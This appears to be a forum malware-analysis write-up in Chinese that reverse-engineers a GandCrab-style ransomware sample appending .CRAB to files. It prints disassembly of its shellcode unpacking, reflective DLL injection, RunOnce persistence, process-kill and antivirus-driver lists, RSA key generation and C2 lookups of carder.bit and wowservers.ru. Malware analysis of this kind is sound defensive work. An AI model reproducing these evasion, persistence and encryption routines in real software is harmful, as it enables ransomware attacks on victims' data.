相关文件:
sample.exe:病毒样本
dimuzd.exe:病毒样本复制到C:\Documents and Settings\Administrator\Application Data\Microsoft\目录下的文件
PE_1.exe:脱壳后的病毒样本
PE_2.dll:病毒样本注入到自身的dll
Shellcode:病毒样本解密出来的shellcode
CRAB-DECRYPT.txt:病毒样本释放的文件
1.txt.CRAB:被病毒样本加密后的文件
pidor.bmp:病毒样本设置的桌面背景图片
具体行为:
1:获取计算机用户名,计算机cpu类型,硬盘空间等信息并且创建互斥体防止多开
2:启动一个线程,在本机查找常见的杀毒软件的驱动文件,如果存在则结束运行
3:将样本文件复制到C:\Documents and Settings\Administrator\Application Data\Microsoft\目录下并修改为随机6个字母+“.exe”,并且设置为开机自动启动
4:遍历进程,终止下列进程:
“msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe","oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe","agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe","agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe","ocomm.exe","mysqld.exe","mysqldnt.exe","mysqldopt.exe","dbeng50.exe","sqbcoreservice.exe","excel.exe","infopath.exe","msaccess.exe","mspub.exe","onenote.exe","outlook.exe","powerpnt.exe","steam.exe","sqlservr.exe","thebat.exe","thebat64.exe","thunderbird.exe","visio.exe","winword.exe","wordpad.exe"
5:生成RSA密钥用于加密文件
6:查询carder.bit, ns2.wowservers.ru carder.bit ,ns1.wowservers.ru服务器地址
7:连接服务器,讲计算机信息,RSA公钥,私钥等信息组合发送
8:遍历磁盘,获取磁盘类型,如果是本地磁盘,网络磁盘,RAM磁盘则感染该磁盘的文件,启动线程加密后缀不是:
.ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .hlp .ldf .icl.icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .them .epack .exe .bat .cmd .CRAB .crab .GDCB .gdcb .gandcrab .yassine_lemmou,并且文件名不是"desktop.ini","autorun.inf","ntuser.dat","iconcache.db","bootsect.bak","boot.ini", "ntuser.dat.log", "thumbs.db", "CRAB-DECRYPT.txt",”*.sql”的文件,并且路径中不含"\ProgramData\", "\IETldCache\", "\Boot\", "\Program Files\","\Tor Browser\",” "Ransomware"” "\All Users\", "\Local Settings\","\Windows\".其它系统特殊文件夹,加密后的后缀改成. CRAB,并在被加密的文件路径目录及桌面生成CRAB-DECRYPT.txt
9:设置桌面背景图片为prdor.bmp
10:倒计时60秒关闭计算机机
分析记录:
解密出shellcode并执行
0040174D |. 50 push eax ; /pOldProtect
0040174E |. FF75 FC push dword ptr [ebp-4] ; |NewProtect
00401751 |. FF35 30634601 push dword ptr [1466330] ; |Size = 1A884 (108676.)
00401757 |. FF35 E8214600 push dword ptr [4621E8] ; |Address = 00175A60
0040175D |. FF15 34E04000 call dword ptr [<&KERNEL32.VirtualPro>; \VirtualProtect
00401763 |. A1 E8214600 mov eax, dword ptr [4621E8]
00401768 |. 8B1D 30634601 mov ebx, dword ptr [1466330]
0040176E |. 8B3D C0404100 mov edi, dword ptr [4140C0]
00401774 |. 56 push esi ; /lParam
00401775 |. 56 push esi ; |wParam
00401776 |. 56 push esi ; |Message
00401777 |. 56 push esi ; |hWnd
00401778 |. 8945 F8 mov dword ptr [ebp-8], eax ; |
0040177B |. FF15 4CE14000 call dword ptr [<&USER32.PostMessageA>; \PostMessageA
00401781 |. 53 push ebx
00401782 |. FF75 F8 push dword ptr [ebp-8]
00401785 |. 893D E4214600 mov dword ptr [4621E4], edi
0040178B |. E8 B9FCFFFF call 00401449 ; shellcode解密函数
00401790 |. 90 nop
00401791 |. 8105 30634601>add dword ptr [1466330], 388B2AFF
0040179B |. FF15 E8214600 call dword ptr [4621E8] ;执行
地址00175A98和00175A9A处是两条花指令,nop掉即可,或者单步到00175A93时,按F8,否则od容易跑飞
00175A82 50 push eax
00175A83 8D45 D8 lea eax, dword ptr [ebp-28]
00175A86 50 push eax
00175A87 8D45 A0 lea eax, dword ptr [ebp-60]
00175A8A 50 push eax
00175A8B E8 0A080000 call 0017629A
00175A90 83C4 0C add esp, 0C
00175A93 E8 04000000 call 00175A9C
00175A98 0000 add byte ptr [eax], al
00175A9A 0000 add byte ptr [eax], al
00175A9C 58 pop eax
00175A9D 8985 74FFFFFF mov dword ptr [ebp-8C], eax
00175AA3 8B00 mov eax, dword ptr [eax]
00175AA5 85C0 test eax, eax
将shellcede复制到自己程序的代码段并执行入口函数
00175D57 8B45 FC mov eax, dword ptr [ebp-4]
00175D5A 8985 4CFFFFFF mov dword ptr [ebp-B4], eax
00175D60 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00175D66 FF70 10 push dword ptr [eax+10] ; 0000CA00
00175D69 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00175D6F 8B4D F0 mov ecx, dword ptr [ebp-10]
00175D72 0348 14 add ecx, dword ptr [eax+14]
00175D75 51 push ecx ; 01A50400 一段shellcode
00175D76 8B85 4CFFFFFF mov eax, dword ptr [ebp-B4]
00175D7C 8B8D 70FFFFFF mov ecx, dword ptr [ebp-90]
00175D82 0348 0C add ecx, dword ptr [eax+C]
00175D85 51 push ecx ; 00401000
00175D86 E8 CB080000 call 00176656
…
0017626A FF75 C0 push dword ptr [ebp-40]
0017626D FF55 D4 call dword ptr [ebp-2C]
00176270 59 pop ecx
00176271 8B85 60FFFFFF mov eax, dword ptr [ebp-A0]
00176277 8B40 0D mov eax, dword ptr [eax+D]
0017627A 8985 64FFFFFF mov dword ptr [ebp-9C], eax
00176280 8B85 64FFFFFF mov eax, dword ptr [ebp-9C]
00176286 0385 70FFFFFF add eax, dword ptr [ebp-90]
0017628C C9 leave
0017628D - FFE0 jmp eax ; sample.00401612 到达OEP
反射式dll注入自身并调用入口点
004011BD |> \8B89 C8424100 mov ecx, dword ptr [ecx+4142C8]
004011C3 |. 53 push ebx
004011C4 |. 56 push esi
004011C5 |. 57 push edi
004011C6 |. E8 65FFFFFF call 00401130
004011CB |. BF 50424100 mov edi, 00414250
004011D0 |. 8D1C07 lea ebx, dword ptr [edi+eax]
004011D3 |. 8B4B 20 mov ecx, dword ptr [ebx+20]
004011D6 |. 895D FC mov dword ptr [ebp-4], ebx
004011D9 |. E8 52FFFFFF call 00401130
004011DE |. 8B4B 24 mov ecx, dword ptr [ebx+24]
004011E1 |. 8D3407 lea esi, dword ptr [edi+eax]
004011E4 |. E8 47FFFFFF call 00401130
004011E9 |. 8B5B 18 mov ebx, dword ptr [ebx+18]
004011EC |. 8BF8 mov edi, eax
004011EE |. 81C7 50424100 add edi, 00414250
004011F4 |. EB 24 jmp short 0040121A
004011F6 |> 8B0E /mov ecx, dword ptr [esi]
004011F8 |. 4B |dec ebx
004011F9 |. E8 32FFFFFF |call 00401130
004011FE |. 05 50424100 |add eax, 00414250
00401203 |. 68 B81D4100 |push 00411DB8 ; ASCII "ReflectiveLoader"
00401208 |. 50 |push eax
00401209 |. E8 22040000 |call 00401630
0040120E |. 59 |pop ecx
……
00401266 . 8DB8 50424100 lea edi, dword ptr [eax+414250]
0040126C . 8D45 E0 lea eax, dword ptr [ebp-20]
0040126F . 50 push eax ; /pOldProtect
00401270 . 6A 40 push 40 ; |NewProtect = PAGE_EXECUTE_READWRITE
00401272 . 68 00300100 push 13000 ; |Size = 13000 (77824.)
00401277 . 68 50424100 push 00414250 ; |Address = PE_1.00414250
0040127C . FF15 50E04000 call dword ptr [<&KERNEL32.VirtualPro>; \VirtualProtect
00401282 . 85C0 test eax, eax
00401284 . 74 30 je short 004012B6
00401286 . FFD7 call edi ; PE_1.0041A190
获取计算机信息,用户名,计算机组,计算机系统,硬盘空间等信息
01A24498 C746 04 AC04A30>mov dword ptr [esi+4], 1A304AC ; UNICODE "pc_user"
01A2449F C746 10 9C04A30>mov dword ptr [esi+10], 1A3049C ; UNICODE "pc_name"
01A244A6 C746 18 0100000>mov dword ptr [esi+18], 1
01A244AD C746 1C 8804A30>mov dword ptr [esi+1C], 1A30488 ; UNICODE "pc_group"
01A244B4 C746 28 8004A30>mov dword ptr [esi+28], 1A30480 ; UNICODE "av"
01A244BB C746 34 7004A30>mov dword ptr [esi+34], 1A30470 ; UNICODE "pc_lang"
01A244C2 C746 40 6004A30>mov dword ptr [esi+40], 1A30460 ; UNICODE "pc_keyb"
01A244C9 C746 4C 4C04A30>mov dword ptr [esi+4C], 1A3044C ; UNICODE "os_major"
01A244D0 C746 58 3C04A30>mov dword ptr [esi+58], 1A3043C ; UNICODE "os_bit"
01A244D7 C746 60 0100000>mov dword ptr [esi+60], 1
01A244DE C746 64 2804A30>mov dword ptr [esi+64], 1A30428 ; UNICODE "ransom_id"
01A244E5 C746 78 2004A30>mov dword ptr [esi+78], 1A30420 ; UNICODE "hdd"
01A244EC 8986 80000000 mov dword ptr [esi+80], eax
01A244F2 C786 88000000 1>mov dword ptr [esi+88], 1A30418 ; UNICODE "ip"
01A244FC FF15 78B1A201 call dword ptr [1A2B178] ; kernel32.GetProcessHeap
……
01A2810C 8946 08 mov dword ptr [esi+8], eax
01A2810F 51 push ecx
01A28110 50 push eax
01A28111 C745 EC 0001000>mov dword ptr [ebp-14], 100
01A28118 FF15 4CB0A201 call dword ptr [1A2B04C] ; advapi32.GetUserNameW
01A2811E 837E 0C 00 cmp dword ptr [esi+C], 0
01A28122 74 22 je short 01A28146
01A28124 6A 04 push 4
01A28126 68 00300000 push 3000
01A2812B 6A 20 push 20
01A2812D 6A 00 push 0
01A2812F C745 EC 1E00000>mov dword ptr [ebp-14], 1E
01A28136 FFD7 call edi
01A28138 8D4D EC lea ecx, dword ptr [ebp-14]
01A2813B 8946 14 mov dword ptr [esi+14], eax
01A2813E 51 push ecx
01A2813F 50 push eax
01A28140 FF15 04B1A201 call dword ptr [1A2B104] ; kernel32.GetComputerNameW
01A28146 837E 18 00 cmp dword ptr [esi+18], 0
……
01A2816F 50 push eax
01A28170 68 E410A301 push 1A310E4 ; UNICODE "Domain"
01A28175 68 F810A301 push 1A310F8 ; UNICODE "SYSTEM\CurrentControlSet\services\Tcpip\Parameters"
01A2817A 68 02000080 push 80000002
01A2817F E8 DCFEFFFF call 01A28060
01A28184 85C0 test eax, eax
01A28186 74 11 je short 01A28199
01A28188 8B46 20 mov eax, dword ptr [esi+20]
01A2818B 66:8338 00 cmp word ptr [eax], 0
01A2818F 75 15 jnz short 01A281A6
01A28191 68 6011A301 push 1A31160 ; UNICODE "WORKGROUP"
01A28196 50 push eax
01A28197 EB 08 jmp short 01A281A1
创建互斥体,互斥体名为获取到的计算机信息。如果互斥体存在则结束本进程
01AB5169 68 FC04AC01 push 1AC04FC ; UNICODE "Global\"
01AB516E 56 push esi
01AB516F FF15 84B1AB01 call dword ptr [1ABB184] ; kernel32.lstrcpyW
01AB5175 56 push esi
01AB5176 FF15 40B1AB01 call dword ptr [1ABB140] ; kernel32.lstrlenW
01AB517C 8D4C24 10 lea ecx, dword ptr [esp+10]
01AB5180 8D0446 lea eax, dword ptr [esi+eax*2]
01AB5183 50 push eax
01AB5184 E8 672B0000 call 01AB7CF0
01AB5189 56 push esi ; MutexName = "Global\pc_group=WORKGROUP&ransom_id=6aa1d5d1fc51543e
01AB518A 6A 00 push 0
01AB518C 6A 00 push 0
01AB518E FF15 80B1AB01 call dword ptr [1ABB180] ; kernel32.CreateMutexW
将自身复制到C:\Documents and Settings\Administrator\Application Data\Microsoft\目录下,文件名为随机6个字母。
01AB289E 53 push ebx
01AB289F 53 push ebx
01AB28A0 6A 03 push 3
01AB28A2 53 push ebx
01AB28A3 6A 01 push 1
01AB28A5 68 00000080 push 80000000
01AB28AA 51 push ecx
01AB28AB FF15 48B1AB01 call dword ptr [1ABB148] ; kernel32.CreateFileW
01AB28B1 8BF8 mov edi, eax
01AB28B3 83FF FF cmp edi, -1
01AB28B6 74 41 je short 01AB28F9
01AB28B8 53 push ebx
01AB28B9 57 push edi
01AB28BA FF15 60B1AB01 call dword ptr [1ABB160] ; kernel32.GetFileSize
01AB28C0 8945 FC mov dword ptr [ebp-4], eax
01AB28C3 E8 18080000 call 01AB30E0
…
01AB28E3 53 push ebx
01AB28E4 57 push edi
01AB28E5 FF15 3CB1AB01 call dword ptr [1ABB13C] ; kernel32.CreateFileMappingW
01AB28EB 8945 F4 mov dword ptr [ebp-C], eax
01AB28EE 85C0 test eax, eax
修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce添加项“fadophupyvl,“
数据”C:\Documents and Settings\Administrator\Application Data\Microsoft\dyuhul.exe ”
01AB2ACB 6A 00 push 0
01AB2ACD 8D45 FC lea eax, dword ptr [ebp-4]
01AB2AD0 50 push eax
01AB2AD1 6A 00 push 0
01AB2AD3 68 3F000F00 push 0F003F
01AB2AD8 6A 00 push 0
01AB2ADA 6A 00 push 0
01AB2ADC 6A 00 push 0
01AB2ADE 8D85 78FFFFFF lea eax, dword ptr [ebp-88]
01AB2AE4 50 push eax ; SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
01AB2AE5 68 02000080 push 80000002
01AB2AEA FF15 00B0AB01 call dword ptr [1ABB000] ; advapi32.RegCreateKeyExW
01AB2AF0 85C0 test eax, eax
01AB2AF2 75 32 jnz short 01AB2B26
01AB2AF4 57 push edi
01AB2AF5 FF15 40B1AB01 call dword ptr [1ABB140] ; kernel32.lstrlenW
01AB2AFB 03C0 add eax, eax
01AB2AFD 50 push eax
01AB2AFE 57 push edi ; "C:\Documents and Settings\Administrator\Application Data\Microsoft\dyuhul.exe"
01AB2AFF 6A 01 push 1
01AB2B01 6A 00 push 0
01AB2B03 8D45 E4 lea eax, dword ptr [ebp-1C]
01AB2B06 50 push eax ; ValueName = "cozfgrboyac"
01AB2B07 FF75 FC push dword ptr [ebp-4] ; hKey = AC
01AB2B0A FF15 08B0AB01 call dword ptr [1ABB008] ; advapi32.RegSetValueExW
遍历进程,结束掉进程名为:
“msftesql.exe","sqlagent.exe","sqlbrowser.exe","sqlservr.exe","sqlwriter.exe","oracle.exe","ocssd.exe","dbsnmp.exe","synctime.exe","mydesktopqos.exe","agntsvc.exeisqlplussvc.exe","xfssvccon.exe","mydesktopservice.exe","ocautoupds.exe","agntsvc.exeagntsvc.exe","agntsvc.exeencsvc.exe","firefoxconfig.exe","tbirdconfig.exe","ocomm.exe","mysqld.exe","mysqldnt.exe","mysqldopt.exe","dbeng50.exe","sqbcoreservice.exe","excel.exe","infopath.exe","msaccess.exe","mspub.exe","onenote.exe","outlook.exe","powerpnt.exe","steam.exe","sqlservr.exe","thebat.exe","thebat64.exe","thunderbird.exe","visio.exe","winword.exe","wordpad.exe"的进程
01AB51F3 C74424 18 0C05A>mov dword ptr [esp+18], 1AC050C ; UNICODE "msftesql.exe"
01AB51FB C74424 1C 2805A>mov dword ptr [esp+1C], 1AC0528 ; UNICODE "sqlagent.exe"
01AB5203 C74424 20 4405A>mov dword ptr [esp+20], 1AC0544 ; UNICODE "sqlbrowser.exe"
01AB520B C74424 24 6405A>mov dword ptr [esp+24], 1AC0564 ; UNICODE "sqlservr.exe"
01AB5213 C74424 28 8005A>mov dword ptr [esp+28], 1AC0580 ; UNICODE "sqlwriter.exe"
01AB521B C74424 2C 9C05A>mov dword ptr [esp+2C], 1AC059C ; UNICODE "oracle.exe"
01AB5223 C74424 30 B405A>mov dword ptr [esp+30], 1AC05B4 ; UNICODE "ocssd.exe"
01AB522B C74424 34 C805A>mov dword ptr [esp+34], 1AC05C8 ; UNICODE "dbsnmp.exe"
01AB5233 C74424 38 E005A>mov dword ptr [esp+38], 1AC05E0 ; UNICODE "synctime.exe"
01AB523B C74424 3C FC05A>mov dword ptr [esp+3C], 1AC05FC ; UNICODE "mydesktopqos.exe"
01AB5243 C74424 40 2006A>mov dword ptr [esp+40], 1AC0620 ; UNICODE "agntsvc.exeisqlplussvc.exe"
01AB524B C74424 44 5806A>mov dword ptr [esp+44], 1AC0658 ; UNICODE "xfssvccon.exe"
01AB5253 C74424 48 7406A>mov dword ptr [esp+48], 1AC0674 ; UNICODE "mydesktopservice.exe"
01AB525B C74424 4C A006A>mov dword ptr [esp+4C], 1AC06A0 ; UNICODE "ocautoupds.exe"
01AB5263 C74424 50 C006A>mov dword ptr [esp+50], 1AC06C0 ; UNICODE "agntsvc.exeagntsvc.exe"
01AB526B C74424 54 F006A>mov dword ptr [esp+54], 1AC06F0 ; UNICODE "agntsvc.exeencsvc.exe"
01AB5273 C74424 58 1C07A>mov dword ptr [esp+58], 1AC071C ; UNICODE "firefoxconfig.exe"
01AB527B C74424 5C 4007A>mov dword ptr [esp+5C], 1AC0740 ; UNICODE "tbirdconfig.exe"
01AB5283 C74424 60 6007A>mov dword ptr [esp+60], 1AC0760 ; UNICODE "ocomm.exe"
01AB528B C74424 64 7407A>mov dword ptr [esp+64], 1AC0774 ; UNICODE "mysqld.exe"
01AB5293 C74424 68 8C07A>mov dword ptr [esp+68], 1AC078C ; UNICODE "mysqld-nt.exe"
01AB529B C74424 6C A807A>mov dword ptr [esp+6C], 1AC07A8 ; UNICODE "mysqld-opt.exe"
01AB52A3 C74424 70 C807A>mov dword ptr [esp+70], 1AC07C8 ; UNICODE "dbeng50.exe"
01AB52AB C74424 74 E007A>mov dword ptr [esp+74], 1AC07E0 ; UNICODE "sqbcoreservice.exe"
01AB52B3 C74424 78 0808A>mov dword ptr [esp+78], 1AC0808 ; UNICODE "excel.exe"
01AB52BB C74424 7C 1C08A>mov dword ptr [esp+7C], 1AC081C ; UNICODE "infopath.exe"
01AB52C3 C78424 80000000>mov dword ptr [esp+80], 1AC0838 ; UNICODE "msaccess.exe"
01AB52CE C78424 84000000>mov dword ptr [esp+84], 1AC0854 ; UNICODE "mspub.exe"
01AB52D9 C78424 88000000>mov dword ptr [esp+88], 1AC0868 ; UNICODE "onenote.exe"
01AB52E4 C78424 8C000000>mov dword ptr [esp+8C], 1AC0880 ; UNICODE "outlook.exe"
01AB52EF C78424 90000000>mov dword ptr [esp+90], 1AC0898 ; UNICODE "powerpnt.exe"
01AB52FA C78424 94000000>mov dword ptr [esp+94], 1AC08B4 ; UNICODE "steam.exe"
01AB5305 C78424 98000000>mov dword ptr [esp+98], 1AC0564 ; UNICODE "sqlservr.exe"
01AB5310 C78424 9C000000>mov dword ptr [esp+9C], 1AC08C8 ; UNICODE "thebat.exe"
01AB531B C78424 A0000000>mov dword ptr [esp+A0], 1AC08E0 ; UNICODE "thebat64.exe"
01AB5326 C78424 A4000000>mov dword ptr [esp+A4], 1AC08FC ; UNICODE "thunderbird.exe"
01AB5331 C78424 A8000000>mov dword ptr [esp+A8], 1AC091C ; UNICODE "visio.exe"
01AB533C C78424 AC000000>mov dword ptr [esp+AC], 1AC0930 ; UNICODE "winword.exe"
01AB5347 C78424 B0000000>mov dword ptr [esp+B0], 1AC0948 ; UNICODE "wordpad.exe"
01AB5352 FF15 D8B0AB01 call dword ptr [1ABB0D8] ; kernel32.CreateToolhelp32Snapshot
01AB5358 6A 04 push 4
01AB535A 68 00300000 push 3000
01AB535F 68 2C020000 push 22C
01AB5364 8BF0 mov esi, eax
01AB5366 6A 00 push 0
01AB5368 897424 1C mov dword ptr [esp+1C], esi
01AB536C FF15 70B1AB01 call dword ptr [1ABB170] ; kernel32.VirtualAlloc
01AB5372 8BD8 mov ebx, eax
01AB5374 85DB test ebx, ebx
01AB5376 74 13 je short 01AB538B
01AB5378 C703 2C020000 mov dword ptr [ebx], 22C
01AB537E 83FE FF cmp esi, -1
01AB5381 74 08 je short 01AB538B
01AB5383 53 push ebx
01AB5384 56 push esi
01AB5385 FF15 D0B0AB01 call dword ptr [1ABB0D0] ; kernel32.Process32FirstW
01AB538B 8B3D E0B0AB01 mov edi, dword ptr [1ABB0E0] ; kernel32.CloseHandle
01AB5391 8D4B 24 lea ecx, dword ptr [ebx+24]
01AB5394 33F6 xor esi, esi
01AB5396 EB 08 jmp short 01AB53A0
01AB5398 8DA424 00000000 lea esp, dword ptr [esp]
01AB539F 90 nop
01AB53A0 51 push ecx
01AB53A1 FF74B4 14 push dword ptr [esp+esi*4+14]
01AB53A5 FF15 38B1AB01 call dword ptr [1ABB138] ; kernel32.lstrcmpiW
01AB53AB 85C0 test eax, eax
01AB53AD 75 2C jnz short 01AB53DB
01AB53AF FF73 08 push dword ptr [ebx+8]
01AB53B2 50 push eax
01AB53B3 6A 01 push 1
01AB53B5 FF15 1CB1AB01 call dword ptr [1ABB11C] ; kernel32.OpenProcess
01AB53BB 8BF8 mov edi, eax
01AB53BD 85FF test edi, edi
01AB53BF 74 14 je short 01AB53D5
01AB53C1 6A 00 push 0
01AB53C3 57 push edi
01AB53C4 FF15 A4B0AB01 call dword ptr [1ABB0A4] ; kernel32.TerminateProcess
01AB53CA 57 push edi
01AB53CB 8B3D E0B0AB01 mov edi, dword ptr [1ABB0E0] ; kernel32.CloseHandle
01AB53D1 FFD7 call edi
01AB53D3 EB 06 jmp short 01AB53DB
01AB53D5 8B3D E0B0AB01 mov edi, dword ptr [1ABB0E0] ; kernel32.CloseHandle
01AB53DB 46 inc esi
01AB53DC 8D4B 24 lea ecx, dword ptr [ebx+24]
01AB53DF 83FE 27 cmp esi, 27
01AB53E2 ^ 72 BC jb short 01AB53A0
01AB53E4 8B7424 0C mov esi, dword ptr [esp+C]
01AB53E8 53 push ebx
01AB53E9 56 push esi
01AB53EA FF15 D4B0AB01 call dword ptr [1ABB0D4] ; kernel32.Process32NextW
01AB5411 5D pop ebp
01AB5412 C3 retn
生成RSA密钥
01A26F30 55 push ebp
01A26F31 8BEC mov ebp, esp
01A26F33 83EC 0C sub esp, 0C
01A26F36 68 000000F0 push F0000000
01A26F3B 6A 01 push 1
01A26F3D 68 D80DA301 push 1A30DD8 ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"
01A26F42 6A 00 push 0
01A26F44 8D45 FC lea eax, dword ptr [ebp-4]
01A26F47 50 push eax
01A26F48 FF15 20B0A201 call dword ptr [1A2B020] ; advapi32.CryptAcquireContextW
01A26F4E 85C0 test eax, eax
01A26F50 75 36 jnz short 01A26F88
01A26F52 FF15 88B1A201 call dword ptr [1A2B188] ; ntdll.RtlGetLastWin32Error
01A26F58 3D 16000980 cmp eax, 80090016
01A26F5D 75 22 jnz short 01A26F81
01A26F5F 6A 08 push 8
01A26F61 6A 01 push 1
01A26F63 68 D80DA301 push 1A30DD8 ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"
01A26F68 6A 00 push 0
01A26F6A 8D4D FC lea ecx, dword ptr [ebp-4]
01A26F6D 51 push ecx
01A26F6E FF15 20B0A201 call dword ptr [1A2B020] ; advapi32.CryptAcquireContextW
01A26F74 85C0 test eax, eax
01A26F76 75 07 jnz short 01A26F7F
01A26F78 33C0 xor eax, eax
01A26F7A E9 8D000000 jmp 01A2700C
01A26F7F EB 07 jmp short 01A26F88
01A26F81 33C0 xor eax, eax
01A26F83 E9 84000000 jmp 01A2700C
01A26F88 8D55 F8 lea edx, dword ptr [ebp-8]
01A26F8B 52 push edx
01A26F8C 68 01000008 push 8000001
01A26F91 68 00A40000 push 0A400
01A26F96 8B45 FC mov eax, dword ptr [ebp-4]
01A26F99 50 push eax
01A26F9A FF15 34B0A201 call dword ptr [1A2B034] ; advapi32.CryptGenKey
01A26FA0 85C0 test eax, eax
01A26FA2 75 01 jnz short 01A26FA5
01A26FA4 90 nop
01A26FA5 C745 F4 0000000>mov dword ptr [ebp-C], 0
01A26FAC 8B4D 0C mov ecx, dword ptr [ebp+C]
01A26FAF 51 push ecx
01A26FB0 8B55 08 mov edx, dword ptr [ebp+8]
01A26FB3 52 push edx
01A26FB4 6A 00 push 0
01A26FB6 6A 06 push 6
01A26FB8 6A 00 push 0
01A26FBA 8B45 F8 mov eax, dword ptr [ebp-8]
01A26FBD 50 push eax
01A26FBE FF15 1CB0A201 call dword ptr [1A2B01C] ; advapi32.CryptExportKey
01A26FC4 8B4D 14 mov ecx, dword ptr [ebp+14]
01A26FC7 51 push ecx
01A26FC8 8B55 10 mov edx, dword ptr [ebp+10]
01A26FCB 52 push edx
01A26FCC 6A 00 push 0
01A26FCE 6A 07 push 7
01A26FD0 6A 00 push 0
01A26FD2 8B45 F8 mov eax, dword ptr [ebp-8]
01A26FD5 50 push eax
01A26FD6 FF15 1CB0A201 call dword ptr [1A2B01C] ; advapi32.CryptExportKey
01A26FDC 8B4D F8 mov ecx, dword ptr [ebp-8]
01A26FDF 51 push ecx
01A26FE0 FF15 38B0A201 call dword ptr [1A2B038] ; advapi32.CryptDestroyKey
01A26FE6 6A 00 push 0
01A26FE8 8B55 FC mov edx, dword ptr [ebp-4]
01A26FEB 52 push edx
01A26FEC FF15 28B0A201 call dword ptr [1A2B028] ; advapi32.CryptReleaseContext
01A26FF2 6A 10 push 10
01A26FF4 6A 01 push 1
01A26FF6 68 D80DA301 push 1A30DD8 ; UNICODE "Microsoft Enhanced Cryptographic Provider v1.0"
01A26FFB 6A 00 push 0
01A26FFD 8D45 FC lea eax, dword ptr [ebp-4]
01A27000 50 push eax
01A27001 FF15 20B0A201 call dword ptr [1A2B020] ; advapi32.CryptAcquireContextW
01A27007 B8 01000000 mov eax, 1
查找驱动程序klif.sys,kl1.sys,fsdfw.sys,srtsp.sys,srtsp64.sys,NavEx15.sys,NavEng.sys,如果存在则退出(一些杀软常见的驱动)
01AB2DF6 8D4C24 1C lea ecx, dword ptr [esp+1C]
01AB2DFA C74424 20 6>mov dword ptr [esp+20], 660069
01AB2E02 C74424 24 2>mov dword ptr [esp+24], 73002E
01AB2E0A C74424 28 7>mov dword ptr [esp+28], 730079
01AB2E12 66:894424 2>mov word ptr [esp+2C], ax
01AB2E17 C74424 0C 6>mov dword ptr [esp+C], 6C006B
01AB2E1F C74424 10 3>mov dword ptr [esp+10], 2E0031
01AB2E27 C74424 14 7>mov dword ptr [esp+14], 790073
01AB2E2F C74424 18 7>mov dword ptr [esp+18], 73 ; klif.sys
01AB2E37 E8 C4010000 call 01AB3000
01AB2E3C 85C0 test eax, eax
01AB2E3E 75 59 jnz short 01AB2E99
01AB2E40 8D4C24 0C lea ecx, dword ptr [esp+C] ; kl1.sys
01AB2E44 E8 B7010000 call 01AB3000
01AB2E49 85C0 test eax, eax
01AB2E4B 75 4C jnz short 01AB2E99
01AB2E4D 8D4C24 1C lea ecx, dword ptr [esp+1C]
01AB2E51 C74424 1C 6>mov dword ptr [esp+1C], 730066
01AB2E59 C74424 20 6>mov dword ptr [esp+20], 660064
01AB2E61 C74424 24 7>mov dword ptr [esp+24], 2E0077
01AB2E69 C74424 28 7>mov dword ptr [esp+28], 790073
01AB2E71 C74424 2C 7>mov dword ptr [esp+2C], 73 ; fsdfw.sys
01AB2E79 E8 82010000 call 01AB3000
……
01AB31E3 C745 DC 6E0>mov dword ptr [ebp-24], 67006E
01AB31EA C745 E0 2E0>mov dword ptr [ebp-20], 73002E
01AB31F1 C745 E4 790>mov dword ptr [ebp-1C], 730079
01AB31F8 66:8945 E8 mov word ptr [ebp-18], ax ; srtsp.sys
01AB31FC E8 FFFDFFFF call 01AB3000
……
01AB3208 8D4D BC lea ecx, dword ptr [ebp-44] ; srtsp64.sys
01AB320B E8 F0FDFFFF call 01AB3000
01AB3210 85C0 test eax, eax
01AB3212 75 1C jnz short 01AB3230
01AB3214 8D4D A4 lea ecx, dword ptr [ebp-5C] ; NavEx15.sys
01AB3217 E8 E4FDFFFF call 01AB3000
01AB321C 85C0 test eax, eax
01AB321E 75 10 jnz short 01AB3230
01AB3220 8D4D D4 lea ecx, dword ptr [ebp-2C] ; NavEng.sys
01AB3223 E8 D8FDFFFF call 01AB3000
创建进程nslookup.exe,查询carder.bit, ns2.wowservers.ru carder.bit ,ns1.wowservers.ru服务器地址,但是服务器挂了,所以未查询成功
01AB5D31 68 E8030000 push 3E8
01AB5D36 FF15 A0B0AB01 call dword ptr [1ABB0A0] ; kernel32.Sleep
01AB5D3C 6A 04 push 4
01AB5D3E 68 00300000 push 3000
01AB5D43 53 push ebx
01AB5D44 FF15 40B1AB01 call dword ptr [1ABB140] ; kernel32.lstrlenW
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2019-9-9 17:47
被小白鼠_897235编辑
,原因:
